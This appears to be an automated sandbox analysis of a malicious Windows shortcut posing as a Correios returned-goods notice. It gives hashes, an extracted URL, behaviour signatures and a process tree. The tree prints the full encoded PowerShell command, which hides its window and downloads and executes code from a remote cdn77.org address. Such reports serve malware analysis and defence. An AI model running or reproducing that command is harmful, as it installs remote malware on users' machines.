Analysis
  Max time kernel: 120s
  Max time network: 121s
  Platform: windows7_x64
  Resource: win7-20240220-en
  Resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  Submitted: 03-06-2024 12:00
  Static task: static1
  Behavioral task: behavioral1
    Sample: Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
    Resource: win7-20240220-en
  Behavioral task: behavioral2
    Sample: Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
    Resource: win10v2004-20240426-en
General
  Target: Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
  Size: 3KB
  MD5: 246e74b6fffb9d5994f7f70bb6509b45
  SHA1: 4b7bdf4808ce987b9f94ea40bdd081217867483a
  SHA256: 0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
  SHA512: 178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
  Extracted URL: https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  5     2808  powershell.exe
  6     2808  powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2808  powershell.exe
  2808  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  2808  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description                       pid   Process         procid_target
  PID 2912 wrote to memory of 2808  2912  cmd.exe         29
  PID 2912 wrote to memory of 2808  2912  cmd.exe         29
  PID 2912 wrote to memory of 2808  2912  cmd.exe         29
  PID 2808 wrote to memory of 2664  2808  powershell.exe  30
  PID 2808 wrote to memory of 2664  2808  powershell.exe  30
  PID 2808 wrote to memory of 2664  2808  powershell.exe  30
  PID 2664 wrote to memory of 2396  2664  csc.exe         31
  PID 2664 wrote to memory of 2396  2664  csc.exe         31
  PID 2664 wrote to memory of 2396  2664  csc.exe         31
Processes

1. C:\Windows\system32\cmd.exe (PID 2912)
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
   - Suspicious use of WriteProcessMemory
   2. C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2808)
      Command line: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe (PID 2664)
         Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agowh6in.cmdline"
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe (PID 2396)
            Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1594.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1593.tmp"
Network
MITRE ATT&CK Enterprise v15
Downloads